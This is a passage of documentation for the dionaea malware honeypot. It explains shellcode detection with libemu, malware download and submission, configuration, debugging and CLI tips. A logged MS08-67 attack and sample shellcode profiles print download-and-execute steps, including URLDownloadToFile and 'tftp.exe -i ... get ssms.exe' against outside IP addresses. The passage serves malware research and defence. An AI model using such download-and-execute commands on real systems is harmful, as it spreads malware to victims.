2217       Dionaea does not have and may never  will  have  a  function/option  to
2218       rotate the bistream files.  But you can do this by using a cron job and
2219       a simple shell script.
2220
2221       Feel free to use and modify the script below.
2222
2223          #!/bin/bash
2224
2225          # Compress bistream files older than 2 days
2226          find /var/lib/dionaea/bistreams/* -type f -mtime +2 -exec gzip {} \;
2227
2228          # Clear bistream logs from dionaea every week
2229          find /var/lib/dionaea/bistreams/* -type f -mtime +7 -exec rm {} \;
2230          find /var/lib/dionaea/bistreams/* -type d -empty -delete
2231

SUPPORT

2233   Cui honorem, honorem
2234       Google:
2235          Google has supported 3 students to work on dionaea during GSoc 2009,
2236          GSoc 2010 and GSoc 2011.
2237
2238       SURFnet:
2239          SURFnet has supported the project in the past(2010?-2014?).  Working
2240          with SURFnet is a real pleasure.
2241
2242   Support
2243       If you are getting frustrated, because things to not work for  you  and
2244       you already read the faq, join the ml and share your experience, or the
2245       chat.
2246
2247       GitHub
2248          Use the issue tracker to report any problem.
2249
2250          Website: Issue tracker
2251
2252       IRC
2253          From time to time some of the developers join the #nepenthes channel
2254          on freenode. irc://irc.freenode.org/nepenthes
2255
2256       Mailing List:
2257          Only  a few messages every year.  Seems to be dead, no message since
2258          2015.
2259
2260          Website: Mailinglist nepenthes-devel
2261
2262   Links
2263          · GSoC 2009 Project #10 http://honeynet.org/gsoc/project10
2264
2265          · The Honeynet Project
2266
2267       Old documentation:
2268

EXPLOITATION

2270       Attackers do not seek your service,  attackers  want  to  exploit  you,
2271       they’ll  chat  with the service for some packets, and afterwards sent a
2272       payload. dionaea has to detect and evaluate the payload to be  able  to
2273       gain a copy of the malware. In order to do so, dionaea uses libemu.
2274
2275       Given  certain  circumstances, libemu can detect shellcode, measure the
2276       shellcode, and if required even execute the shellcode. Shellcode detec‐
2277       tion  is  done  by  making use of GetPC heuristics, others wrote papers
2278       about it, we decided to write libemu to do so. This detection is rather
2279       time consuming, and therefore done using threads.
2280
2281       The  part  of  dionaea  which takes care of the network io can create a
2282       copy of all in/output run for a connection, this copy is passed to  the
2283       detection  facility,  which  is a tree of detection facilities, at this
2284       moment there is only a single leaf, the emu plugin. The emu plugin uses
2285       threads and libemu to detect and profile/measure shellcode.
2286
2287       Shellcode measurement/profiling is done by running the shellcode in the
2288       libemu vm and recording API calls and  arguments.  For  most  shellcode
2289       profiling  is  sufficient,  the recorded API calls and arguments reveal
2290       enough information to get an idea of the attackers  intention  and  act
2291       upon  them.  For  multi-stage  shellcode,  where the first exploitation
2292       stage of the shellcode would  retrieve  a  second  shellcode  from  the
2293       attacker, profiling is not sufficient, as we lack the information ‘what
2294       to do’ from the second stage of the shellcode, in this case we need  to
2295       make  use  of shellcode execution. Shellcode execution is basically the
2296       same as shellcode profiling, the only difference is not  recording  the
2297       api  calls,  and  we  allow  the shellcode to take certain actions, for
2298       example creating a network connection.
2299
2300   Payloads
2301       Once we have the payload, and the profile, dionaea  has  to  guess  the
2302       intention, and act upon it
2303
2304   Shells - bind/connectback
2305       This payload offers a shell (cmd.exe prompt) to the attacker, either by
2306       binding a port and waiting for the attacker to connect to us again,  or
2307       by connection to the attacker. In both cases, dionaea offers an cmd.exe
2308       emulation to the attacker, parses the input, and acts upon  the  input,
2309       usually the instructions download a file via ftp or tftp.
2310
2311   URLDownloadToFile
2312       These  shellcodes use the URLDownloadToFile api call to retrieve a file
2313       via http, and execute the retrieved file afterwards
2314
2315   Exec
2316       Making use of WinExec, these shellcode execute a single  command  which
2317       has  to  be parsed and processed like the bind/connectback shell shell‐
2318       commands.
2319
2320   Multi Stage Payloads
2321       We never know what the second stage is, therefore  libemu  is  used  to
2322       execute the shellcode in the libemu vm.
2323

DOWNLOADS

2325       Once  dionaea  gained the location of the file the attacker wants it to
2326       downloads from the shellcode, dionaea will try to  download  the  file.
2327       The  protocol  to  downloads  files  via tftp and ftp is implemented in
2328       python (ftp.py and tftp.py) as part of dionaea, downloading  files  via
2329       http  is  done in the curl module - which makes use of libcurl’s awsome
2330       http capabilities. Of course libcurl can run downloads for ftp too, but
2331       the  ftp  services  embedded in malware a designed to work with windows
2332       ftp.exe client, and fail for others.
2333

SUBMIT

2335       Once dionaea got a copy of the worm attacking her, we may want to store
2336       the  file  locally for further analysis, or submit the file to some 3rd
2337       party for further analysis.
2338
2339       dionaea can http/POST the file to several services like CWSandbox, Nor‐
2340       man Sandbox or VirusTotal.
2341

CONFIGURATION - DIONAEA.CONF

2343       If  you  want  to change the software, it is really important to under‐
2344       stand how it works, therefore please take the time  to  how  it  works.
2345       dionaea.conf is the main configuration file, the file controls consists
2346       of sections for:
2347
2348          · logging
2349
2350          · processors
2351
2352          · downloads
2353
2354          · bistreams
2355
2356          · submit
2357
2358          · listen
2359
2360          · modules
2361
2362   logging
2363       The logging section controls … logging, you can specify log domains and
2364       loglevel for different logfiles.  As dionaea is pretty … verbose, it is
2365       useful to rotate the logfiles using logrotate.
2366
2367          # logrotate requires dionaea to be started with a pidfile
2368          # in this case -p /opt/dionaea/var/run/dionaea.pid
2369          # adjust the path to your needs
2370          /opt/dionaea/var/log/dionaea*.log {
2371                  notifempty
2372                  missingok
2373                  rotate 28
2374                  daily
2375                  delaycompress
2376                  compress
2377                  create 660 root root
2378                  dateext
2379                  postrotate
2380                          kill -HUP `cat /opt/dionaea/var/run/dionaea.pid`
2381                  endscript
2382          }
2383
2384       //etc/logrotate.d/dionaea/
2385
2386   modules
2387       downloads specify where to store downloaded malware.  bistreams specify
2388       where  to  store  bi-directional  streams, these are pretty useful when
2389       debugging, as they allow to replay an attack on ip-level, without mess‐
2390       ing  with  pcap&tcpreplay, which never worked for me.  submit specifies
2391       where to send files to via http or ftp, you can define  a  new  section
2392       within  submit  if  you  want to add your own service.  listen sets the
2393       addresses dionaea will listen to. The default is all addresses  it  can
2394       find,  this  mode  is call getifaddrs, but you can set it to manual and
2395       specify a single address if you want to limit it.  modules is the  most
2396       powerfull section, as it specifies the modules to load, and the options
2397       for each module.
2398
2399   logsql
2400       This section controls the logging to the sqlite database.  logsql  does
2401       not  work when chrooting - python makes the path absolute and fails for
2402       requests after chroot().
2403
2404       logsql requires the directory where the logsql.sqlite file  resides  to
2405       be  writeable  by  the  user, as well as the logsql.sqlite file itself.
2406       So, if you drop user privs, make sure the user you drop to  is  allowed
2407       to read/write the file and the directory.
2408
2409          chown MYUSER:MYGROUP /var/lib/dionaea -R
2410
2411       To  query  the  logsql database, I recommend looking at the readlogsql‐
2412       tree.py <#readlogsqltree>  script,  for  visualisation  the  gnuplotsql
2413       <#gnuplotsql> script.
2414
2415       The blog on logsql:
2416
2417          · 2009-11-06 dionaea sql logging
2418
2419          · 2009-12-08 post it yourself
2420
2421          · 2009-12-12 sqlite performance
2422
2423          · 2009-12-14 virustotal fun
2424
2425          · 2009-12-15 paris mission pack avs
2426
2427          · 2010-06-06 data visualisation
2428
2429   logxmpp
2430       This  section controls the logging to xmpp services. If you want to use
2431       logxmpp, make sure to enable logxmpp in the  ihandler  section.   Using
2432       logxmpp allows you to share your new collected files with other sensors
2433       anonymously.
2434
2435       The blog on logxmpp:
2436
2437          · 2010-02-10 xmpp backend
2438
2439          · 2010-05-12 xmpp take #2
2440
2441          · 2010-05-15 xmpp take #3
2442
2443       pg_backend <#pg_backend> can be used as a backend for xmpp logging sen‐
2444       sors.
2445
2446   p0f
2447       Not  enabled  by  default,  but  recommend:  the p0f service, enable by
2448       uncommenting p0f in the ihandlers section of the  python  modules  sec‐
2449       tion,  and  start p0f as suggested in the config. It costs nothing, and
2450       gives some pretty  cool,  even  if  outdated,  informations  about  the
2451       attackers  operating  system,  and you can look them up from the sqlite
2452       database, even the rejected connections.  If you  face  problems,  here
2453       are some hints.
2454
2455   ihandlers
2456       ihandlers  section  is  used  to specify which ihandlers get started by
2457       ihandlers.py . You do not want to miss p0f and logsql.
2458
2459   services
2460       services controls which services will get started by services.py
2461

UTILS

2463       Dionaea ships with some utils, as these utils are written in python and
2464       rely on the python3 interpreter dionaea requires to operate, this soft‐
2465       ware can be found in modules/python/utils:
2466
2467          readlogsqltree <#readlogsqltree> -
2468          modules/python/readlogsqltree.py
2469
2470       readlogsqltree is a python3 script  which  queries  the  logsql  sqlite
2471       database  for attacks, and prints out all related information for every
2472       attack.  This is an example for an attack, you  get  the  vulnerability
2473       exploited, the time, the attacker, information about the shellcode, the
2474       file offered for download, and even the virustotal report for the file:
2475
2476          2010-10-07 20:37:27
2477            connection 483256 smbd tcp accept 10.0.1.11:445 <- 93.177.176.190:47650 (483256 None)
2478            dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2479            dcerpc bind: uuid '7d705026-884d-af82-7b3d-961deaeb179a' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2480            dcerpc bind: uuid '7f4fdfe9-2be7-4d6b-a5d4-aa3c831503a1' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2481            dcerpc bind: uuid '8b52c8fd-cc85-3a74-8b15-29e030cdac16' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2482            dcerpc bind: uuid '9acbde5b-25e1-7283-1f10-a3a292e73676' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2483            dcerpc bind: uuid '9f7e2197-9e40-bec9-d7eb-a4b0f137fe95' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2484            dcerpc bind: uuid 'a71e0ebe-6154-e021-9104-5ae423e682d0' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2485            dcerpc bind: uuid 'b3332384-081f-0e95-2c4a-302cc3080783' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2486            dcerpc bind: uuid 'c0cdf474-2d09-f37f-beb8-73350c065268' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2487            dcerpc bind: uuid 'd89a50ad-b919-f35c-1c99-4153ad1e6075' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2488            dcerpc bind: uuid 'ea256ce5-8ae1-c21b-4a17-568829eec306' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2489            dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
2490            profile: [{'return': '0x7df20000', 'args': ['urlmon'], 'call': 'LoadLibraryA'}, {'return': '0', 'args': ['', 'http://208.53.183.158/m.exe', '60.exe', '0', '0'], 'call': 'URLDownloadToFile'}, {'return': '32', 'args': ['60.exe', '895'], 'call': 'WinExec'}, {'return': '0', 'args': ['-1'], 'call': 'Sleep'}]
2491            offer: http://208.53.183.158/m.exe
2492            download: 3eab379ddac7d80d3e38399fd273ddd4 http://208.53.183.158/m.exe
2493              virustotal 2010-10-07 04:59:07 5/38 (13%) http://www.virustotal.com/file-scan/report.html?id=265e39edcba9d9004451601544e625f2d3d04f837d0aaf1f8464cb2c819c1939-1286420347
2494                names 'High Risk Fraudulent Security Program' 'Suspicious file' 'Trojan.DownLoader1.27100' 'Worm.Win32.Rimecud' 'Worm:Win32/Rimecud.B'
2495
2496       To create such report for your own honeypots activities for the last 24
2497       hours run:
2498
2499          ./readlogsqltree.py  -t $(date '+%s')-24*3600 /var/lib/dionaea/logsql.sqlite
2500
2501
2502          gnuplotsql <#gnuplotsql> - modules/python/gnuplotsql.py
2503
2504       gnuplotsql is a very slow python3 script which runs some queries on the
2505       logsql <#logsql> sqlite database and creates graphs with gnuplot of the
2506       data,  stores them on disk and creates an index of the data. The images
2507       are per protocol and look like this: Overview for dionaea  smbd.   Here
2508       <gnuplotsql>  is how the whole thing looks like.  To create such images
2509       of your own data, run:
2510
2511          ./gnuplotsql.py -d /var/lib/dionaea/logsql.sqlite -p smbd -p epmapper -p mssqld -p httpd -p ftpd
2512
2513       The blog got something on gnuplotsql as well:
2514
2515          · 2010-12-05 sudden death
2516
2517          · 2010-10-01 Infosanity’s Blog: gnuplotsql.py
2518
2519          · 2010-09-19 gnuplotsql
2520
2521          pg_backend <#pg_backend> - modules/python/xmpp/pg_backend.py
2522
2523       pg_backend is the backend for logxmpp <#logxmpp>,  currently  it  is  a
2524       python2.x  script  which  uses  pyxmpp  to  access the xmpp service. It
2525       parses the messages received and can store the  events  in  a  postgres
2526       database  and  the  received files on disk. pg_backend requires an xmpp
2527       account:
2528
2529          /without db/
2530          ./pg_backend.py -U USER@sensors.carnivore.it -P XMPPPASS -M dionaea.sensors.carnivore.it -C anon-files -C anon-events -f /tmp/
2531
2532          /with db/
2533          create database
2534
2535          psql ...
2536
2537          start backend
2538
2539          ./pg_backend.py -U USER@sensors.carnivore.it -P XMPPPASS -M dionaea.sensors.carnivore.it -C anon-files -C anon-events -s DBHOST -u DBUSER -d xmpp -p DBPASS -f /tmp/
2540

SEGFAULT

2542       In case you experience a segfault, you will see something like this:
2543
2544       This is the end.  This software just had a segmentation fault.  The bug
2545       you encountered may even be exploitable.  If you want to assist in fix‐
2546       ing the bug, please send the backtrace below to nepenthesdev@gmail.com.
2547       You  can  create better backtraces with gdb, for more information visit
2548       http://dionaea.carnivore.it/#segfault Once you read this message,  your
2549       tty may be broken, simply type reset, so it will come to life again:
2550
2551          /opt/dionaea/bin/dionaea(sigsegv_backtrace_cb+0x20)[0x805c11e]
2552          [0x70d420]
2553          /opt/dionaea/lib/libemu/libemu.so.2(emu_env_w32_eip_check+0x94)[0x186974]
2554          /opt/dionaea/lib/dionaea/emu.so(run+0x39)[0x89cced]
2555          /opt/dionaea/lib/dionaea/emu.so(profile+0xbb)[0x89db88]
2556          /opt/dionaea/lib/dionaea/emu.so(proc_emu_on_io_in+0x1e1)[0x89bfc5]
2557          /opt/dionaea/bin/dionaea(recurse_io_process+0x31)[0x805df4a]
2558          /opt/dionaea/bin/dionaea(processors_io_in_thread+0x85)[0x805e08d]
2559          /opt/dionaea/bin/dionaea(threadpool_wrapper+0x2e)[0x805c99a]
2560          /opt/dionaea/lib/libglib-2.0.so.0[0xaa9498]
2561          /opt/dionaea/lib/libglib-2.0.so.0[0xaa7a2f]
2562          /lib/libpthread.so.0[0xd8973b]
2563          /lib/libc.so.6(clone+0x5e)[0x2b3cfe]
2564
2565       While  the  backtrace itself gives an idea what might be wrong, it does
2566       not fix the problem. To fix the problem, the logfiles usually help,  as
2567       dionaea  is  very  verbose  by default. Below are some hints how to get
2568       started with debugging, click here <#support> for assistance.
2569
2570       debugging
2571

VALGRIND

2573       Valgrind does a great job, here is how I use it:
2574
2575          valgrind -v --leak-check=full --leak-resolution=high --show-reachable=yes \
2576           --log-file=dionaea-debug.log /opt/dionaea/bin/dionaea --my-dionaea-options
2577
2578
2579          gdb
2580
2581
2582          logfile assisted
2583
2584       For the above example, I was able to scrape the shellcode from the log‐
2585       file,  and run it in libemu, without involving dionaea at all, reducing
2586       the problem:
2587
2588          gdb /opt/dionaea/bin/sctest
2589          (gdb) run -S -s 10000000 -g < sc.bin
2590          Starting program: /media/sda4/opt64/dionaea/bin/sctest -S -s 10000000 -g < sc.bin
2591
2592       Once it crashed, I retrieved a full backtrace:
2593
2594          Program received signal SIGSEGV, Segmentation fault.
2595          env_w32_hook_GetProcAddress (env=0x629a30, hook=<value optimized out>) at environment/win32/env_w32_dll_export_kernel32_hooks.c:545
2596          545                             struct emu_env_hook *hook = (struct emu_env_hook *)ehi->value;
2597
2598          (gdb) bt full
2599          #0  env_w32_hook_GetProcAddress (env=0x629a30, hook=<value optimized out>) at environment/win32/env_w32_dll_export_kernel32_hooks.c:545
2600                  dll = 0x6366f0
2601                  ehi = <value optimized out>
2602                  hook = <value optimized out>
2603                  c = 0x611180
2604                  mem = <value optimized out>
2605                  eip_save = <value optimized out>
2606                  module = 2088763392
2607                  p_procname = 4289925
2608                  procname = <value optimized out>
2609          #1  0x00007ffff7b884fb in emu_env_w32_eip_check (env=0x629a30) at environment/win32/emu_env_w32.c:306
2610                  dll = <value optimized out>
2611                  ehi = <value optimized out>
2612                  hook = 0x64c5b0
2613                  eip = <value optimized out>
2614          #2  0x0000000000403995 in test (e=0x60f0e0) at sctestmain.c:277
2615                  hook = 0xe2
2616                  ev = 0x0
2617                  iv = <value optimized out>
2618                  cpu = 0x611180
2619                  mem = <value optimized out>
2620                  env = 0x629a30
2621                  na = <value optimized out>
2622                  j = 7169
2623                  last_vertex = 0x0
2624                  graph = 0x0
2625                  eh = 0x0
2626                  ehi = 0x0
2627                  ret = <value optimized out>
2628                  eipsave = 2088807840
2629          #3  0x00000000004044e4 in main (argc=5, argv=0x7fffffffe388) at sctestmain.c:971
2630                  e = <value optimized out>
2631
2632       In this case, the problem was a bug in libemu.
2633          gdb dump memory
2634
2635       Once again, it broke, and we got a backtrace:
2636
2637          #0  0xb70b0b57 in emu_queue_enqueue (eq=0xb3da0918, data=0x4724ab) at emu_queue.c:63
2638                  eqi = (struct emu_queue_item *) 0x0
2639          #1  0xb70b15d1 in emu_shellcode_run_and_track (e=0xb4109cd0, data=0xb411c698 "", datasize=<value optimized out>, eipoffset=<value optimized out>,
2640                  steps=256, etas=0xb410cd60, known_positions=0xb3d7a810, stats_tested_positions_list=0xb3da3bf0, brute_force=true) at emu_shellcode.c:408
2641                  current_pos_ti_diff = (struct emu_tracking_info *) 0x88c3c88
2642                  current_pos_ht = <value optimized out>
2643                  current_pos_v = <value optimized out>
2644                  current_pos_satii = (struct emu_source_and_track_instr_info *) 0xb407e7f8
2645                  bfs_queue = (struct emu_queue *) 0xb3e17668
2646                  ret = 4662443
2647                  eipsave = <value optimized out>
2648                  hook = <value optimized out>
2649                  j = 4
2650                  es = <value optimized out>
2651                  eli = (struct emu_list_item *) 0xb3e17658
2652                  cpu = (struct emu_cpu *) 0xb4109ab0
2653                  mem = (struct emu_memory *) 0xb410c3a0
2654                  eq = (struct emu_queue *) 0xb3da0918
2655                  env = (struct emu_env *) 0xb3e10208
2656                  eli = (struct emu_list_item *) 0x4724ab
2657          #2  0xb70b1a2a in emu_shellcode_test (e=0xb4109cd0, data=0xb411c698 "", size=<value optimized out>) at emu_shellcode.c:546
2658                  es = (struct emu_stats *) 0xb3d92b28
2659                  new_results = (struct emu_list_root *) 0xb3da3bf0
2660                  offset = <value optimized out>
2661                  el = (struct emu_list_root *) 0xb4100510
2662                  etas = (struct emu_track_and_source *) 0xb410cd60
2663                  eh = (struct emu_hashtable *) 0xb3d7a810
2664                  eli = (struct emu_list_item *) 0xb3d92b40
2665                  results = (struct emu_list_root *) 0xb3d82850
2666                  es = <value optimized out>
2667                  __PRETTY_FUNCTION__ = "emu_shellcode_test"
2668          #3  0xb712140c in proc_emu_on_io_in (con=0x8864b58, pd=0x87dc388) at detect.c:145
2669                  e = (struct emu *) 0xb4109cd0
2670                  ctx = (struct emu_ctx *) 0x87a2400
2671                  offset = 14356
2672                  streamdata = (void *) 0xb411c698
2673                  size = 8196
2674                  ret = 0
2675                  __PRETTY_FUNCTION__ = "proc_emu_on_io_in"
2676          #4  0x0805e8be in recurse_io_process (pd=0x87dc388, con=0x8864b58, dir=bistream_in) at processor.c:167
2677          No locals.
2678          #5  0x0805ea01 in processors_io_in_thread (data=0x8864b58, userdata=0x87dc388) at processor.c:197
2679                  con = (struct connection *) 0x8864b58
2680                  pd = (struct processor_data *) 0x87dc388
2681                  __PRETTY_FUNCTION__ = "processors_io_in_thread"
2682          #6  0x0805d2da in threadpool_wrapper (data=0x87d7bd0, user_data=0x0) at threads.c:49
2683                  t = (struct thread *) 0x87d7bd0
2684                  timer = (GTimer *) 0xb4108540
2685          #7  0xb77441f6 in g_thread_pool_thread_proxy (data=0x83db460) at gthreadpool.c:265
2686                  task = (gpointer) 0x87d7bd0
2687                  pool = (GRealThreadPool *) 0x83db460
2688          #8  0xb7742b8f in g_thread_create_proxy (data=0x83dc7d0) at gthread.c:635
2689                  __PRETTY_FUNCTION__ = "g_thread_create_proxy"
2690          #9  0xb76744c0 in start_thread () from /lib/i686/cmov/libpthread.so.0
2691          No symbol table info available.
2692          #10 0xb75f36de in clone () from /lib/i686/cmov/libc.so.6
2693          No symbol table info available.
2694
2695       Again, it was a bug in libemu, an unbreakable loop consuming  all  mem‐
2696       ory.   To  reproduce,  we  have to dump the tested buffer, therefore we
2697       need the buffers address and size. Luckily the size is noted  in  frame
2698       #2  as 8196 and and the data address is a parameter which got not opti‐
2699       mized out for frame #2:
2700
2701          dump binary memory /tmp/sc.bin 0xb411c698 0xb411e89c
2702
2703       Afterwards, debugging libemu by feeding the data into sctest is easy.
2704
2705       I’ve had fun with objgraph and gdb debugging reference count  leaks  in
2706       python  too,  here  <http://carnivore.it/2009/12/23/arcane_bugs> is the
2707       writeup:
2708
2709          gdb python3 embedded
2710
2711       Sometimes, there is something wrong with the python  scripts,  but  gdb
2712       does not provide any useful output:
2713
2714          bt full
2715          #12 0xb765f12d in PyEval_EvalFrameEx (f=0x825998c, throwflag=0) at Python/ceval.c:2267
2716                  stack_pointer = (PyObject **) 0x8259af0
2717                  next_instr = (unsigned char *) 0x812fabf "m'"
2718                  opcode = 100
2719                  oparg = <value optimized out>
2720                  why = 3071731824
2721                  err = 1
2722                  x = (PyObject *) 0xb7244aac
2723                  v = <value optimized out>
2724                  w = (PyObject *) 0xadb5e4dc
2725                  u = (PyObject *) 0xb775ccb0
2726                  freevars = (PyObject **) 0x8259af0
2727                  retval = (PyObject *) 0x0
2728                  tstate = (PyThreadState *) 0x809aab0
2729                  co = (PyCodeObject *) 0xb717b800
2730                  instr_ub = -1
2731                  instr_lb = 0
2732                  instr_prev = -1
2733                  first_instr = (unsigned char *) 0x812f918 "t"
2734                  names = (PyObject *) 0xb723f50c
2735                  consts = (PyObject *) 0xb71c9f7c
2736                  opcode_targets = {0xb765d202, 0xb765f60a, 0xb766133a, 0xb76612db, 0xb7661285, 0xb7661222, 0xb765d202, 0xb765d202, 0xb765d202, 0xb76611dd,
2737            0xb766114b, 0xb76610b9, 0xb766100f, 0xb765d202, 0xb765d202, 0xb7660f7d, 0xb765d202, 0xb765d202, 0xb765d202, 0xb7660eb7, 0xb7660dfb, 0xb765d202,
2738            0xb7660d30, 0xb7660c65, 0xb7660ba9, 0xb7660aed, 0xb7660a31, 0xb7660975, 0xb76608b9, 0xb76607fd, 0xb765d202 <repeats 24 times>, 0xb7660736, 0xb766066b,
2739            0xb76605af, 0xb76604f3, 0xb765d202, 0xb7660437, 0xb766035d, 0xb76602ad, 0xb7661aba, 0xb76619fe, 0xb7661942, 0xb7661886, 0xb7661b76, 0xb76614a8,
2740            0xb7661413, 0xb766138e, 0xb766171f, 0xb76616e6, 0xb765d202, 0xb765d202, 0xb765d202, 0xb766162a, 0xb766156e, 0xb76601f1, 0xb7660135, 0xb76617ca,
2741            0xb7660120, 0xb765fff7, 0xb765d202, 0xb765fd72, 0xb765fc6e, 0xb765d202, 0xb765fc1d, 0xb765fe17, 0xb765fd90, 0xb765fec0, 0xb765fb41, 0xb765fadc,
2742            0xb765f9ed, 0xb765f94d, 0xb765f8be, 0xb765f7e3, 0xb765f779, 0xb765f6bd, 0xb765f66c, 0xb765ef1d, 0xb765eea2, 0xb765ede1, 0xb765ed1a, 0xb765ec35,
2743            0xb765ebc3, 0xb765eb30, 0xb765ea69, 0xb765f1c7, 0xb765f027, 0xb765f560, 0xb765efc1, 0xb76630e3, 0xb766310c, 0xb765e64c, 0xb765e592, 0xb765f49a,
2744            0xb765f3de, 0xb765d202, 0xb765d202, 0xb765f39e, 0xb7663135, 0xb766315f, 0xb765e9cb, 0xb765d202, 0xb765e948, 0xb765e8bb, 0xb765e817, 0xb765d202,
2745            0xb765d202, 0xb765d202, 0xb765d2ae, 0xb765e3e0, 0xb7663275, 0xb765e1a2, 0xb766324e, 0xb765e0ba, 0xb765e01e, 0xb765df74, 0xb765d202, 0xb765d202,
2746            0xb7663189, 0xb76631d3, 0xb7663220, 0xb765e149, 0xb765d202, 0xb765de09, 0xb765dec0, 0xb765f2c0, 0xb765d202 <repeats 108 times>}
2747          #13 0xb7664ac0 in PyEval_EvalCodeEx (co=0xb717b800, globals=0xb7160b54, locals=0x0, args=0x84babb8, argcount=9, kws=0x0, kwcount=0, defs=0xb719e978,
2748                  defcount=1, kwdefs=0x0, closure=0x0) at Python/ceval.c:3198
2749                  f = (PyFrameObject *) 0x825998c
2750                  retval = <value optimized out>
2751                  freevars = (PyObject **) 0x8259af0
2752                  tstate = (PyThreadState *) 0x809aab0
2753                  x = <value optimized out>
2754                  u = <value optimized out>
2755
2756       Luckily  python3  ships  with  some gdb macros, which assist in dealing
2757       with   this   mess.    You    can    grab    them    over    here    <‐
2758       http://svn.python.org/view/python/tags/r311/Misc/gdbinit?view=markup>,
2759       place them to ~/.gdbinit, where ~ is  the  homedirectory  of  the  user
2760       dionaea  runs  as.   If  you  get  /warning:  not  using untrusted file
2761       “/home/user/.gdbinit”/ you are running  gdb  via  sudo,  and  the  file
2762       /home/user/.gdbinit  has  to  be  owned by root.  If you are running as
2763       root, and you get /Program received signal SIGTTOU, Stopped  (tty  out‐
2764       put)./,  run stty -nostop before running gdb, reattach the process with
2765       fg, close gdb properly, and start over.
2766
2767       Once you got the macros loaded properly at gdb startup,  set  a  break‐
2768       point on PyEval_EvalFrameEx after dionaea loaded everything:
2769
2770          break PyEval_EvalFrameEx
2771
2772       Then we have some useful macros for gdb:
2773
2774          up
2775          pyframev
2776
2777       pyframev combines the output of pyframe and pylocals.
2778
2779       Be aware you can segfault dionaea now from within gdb, going up, out of
2780       the python call stack and calling some of the macros can  and  in  most
2781       cases  will  segfault dionaea, therefore use backtrace to make sure you
2782       are still within valid frames.  We can’t use  pystack  or  pystackv  as
2783       they  rely  on  Py_Main,  which  is  an invalid assumption for embedded
2784       python.
2785

TIPS AND TRICKS

2787       dionaea embedds a python interpreter, and can offer a python cli there‐
2788       fore too.  The python cli is blocking, if you start entering a command,
2789       the whole process will wait for you to finish it, and  not  accept  any
2790       new  connections.  You can use the python cli to interact with dionaea,
2791       which is very useful for development and debugging.
2792
2793   Configuration
2794       You can access the dionaea.conf via python (readonly):
2795
2796          from dionaea import g_dionaea
2797          g_dionaea.config()
2798
2799   Completition and History on the CLI
2800       If you use the cli often, you can make it behave  like  a  real  shell,
2801       including history and completition.:
2802
2803          import rlcompleter, readline
2804          readline.parse_and_bind('tab: complete')
2805
2806   Triggering Downloads
2807       Sometimes  it  helps  to  trigger  a  download,  without waiting for an
2808       attack.  Very useful if you want to verify permissions are correct when
2809       switching  the  user,  or making sure a submission to a 3rd party works
2810       correctly.  You can trigger downloads for all major protocols.
2811
2812   ftp
2813          from dionaea.ftp import ftp
2814          f = ftp()
2815          f.download(None, 'anonymous','guest','ftp.kernel.org',21, 'welcome.msg', 'binary','ftp://ftp.kernel.org/welcome.msg')
2816
2817   tftp
2818          from dionaea.tftp import TftpClient
2819          t = TftpClient()
2820          t.download(None, 'tftp.example.com', 69, 'filename')
2821
2822   http
2823       As the http download is not done in python, we do not use the  download
2824       facility directly, but create an incident, which will trigger the down‐
2825       load:
2826
2827          from dionaea.core import incident
2828          i = incident("dionaea.download.offer")
2829          i.set("url", "http://www.honeynet.org")
2830          i.report()
2831
2832   incidents
2833       incidents are the ipc used in dionaea.
2834
2835   dumping
2836          from dionaea.core import ihandler
2837          class idumper(ihandler):
2838                  def __init__(self, pattern):
2839                          ihandler.__init__(self, pattern)
2840                  def handle(self, icd):
2841                          icd.dump()
2842
2843          a = idumper('*')
2844
2845   emu profile
2846       Small collection of various shellcode profiles gatherd from dionaea.
2847
2848   CreateProcess Commands
2849       This profile will trigger a download via tftp.
2850
2851          p='[{"call": "CreateProcess", "args": ["", "tftp.exe -i 92.17.46.208 get ssms.exe", "", "", "1", "40", "", "", {"dwXCountChars": "0", "dwFillAttribute": "0", "hStdInput": "0", "dwYCountChars": "0", "cbReserved2": "0", "cb": "0", "dwX": "0", "dwY": "0", "dwXSize": "0", "lpDesktop": "0", "hStdError": "68", "dwFlags": "0", "lpReserved": "0", "lpReserved2": "0", "hStdOutput": "0", "lpTitle": "0", "dwYSize": "0", "wShowWindow": "0"}, {"dwProcessId": "4712", "hProcess": "4711", "dwThreadId": "4714", "hThread": "4712"}], "return": "-1"}, {"call": "CreateProcess", "args": ["", "ssms.exe", "", "", "1", "40", "", "", {"dwXCountChars": "0", "dwFillAttribute": "0", "hStdInput": "0", "dwYCountChars": "0", "cbReserved2": "0", "cb": "0", "dwX": "0", "dwY": "0", "dwXSize": "0", "lpDesktop": "0", "hStdError": "68", "dwFlags": "0", "lpReserved": "0", "lpReserved2": "0", "hStdOutput": "0", "lpTitle": "0", "dwYSize": "0", "wShowWindow": "0"}, {"dwProcessId": "4712", "hProcess": "4711", "dwThreadId": "4714", "hThread": "4712"}], "return": "-1"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]'
2852          from dionaea.core import incident
2853          i = incident("dionaea.module.emu.profile")
2854          i.set("profile", str(p))
2855          i.report()
2856
2857   URLDownloadToFile
2858       This profile will trigger a download.
2859
2860          p='[{"call": "LoadLibraryA", "args": ["urlmon"], "return": "0x7df20000"}, {"call": "URLDownloadToFile", "args": ["", "http://82.165.32.34/compiled.exe", "47.scr", "0", "0"], "return": "0"}, {"call": "WinExec", "args": ["47.scr", "895"], "return": "32"}]'
2861          from dionaea.core import incident
2862          i = incident("dionaea.module.emu.profile")
2863          i.set("profile", str(p))
2864          i.report()
2865
2866   WinExec Commands
2867       This profile uses WinExec to create a  command  file  for  windows  ftp
2868       client, downloads a file, and executes the file.:
2869
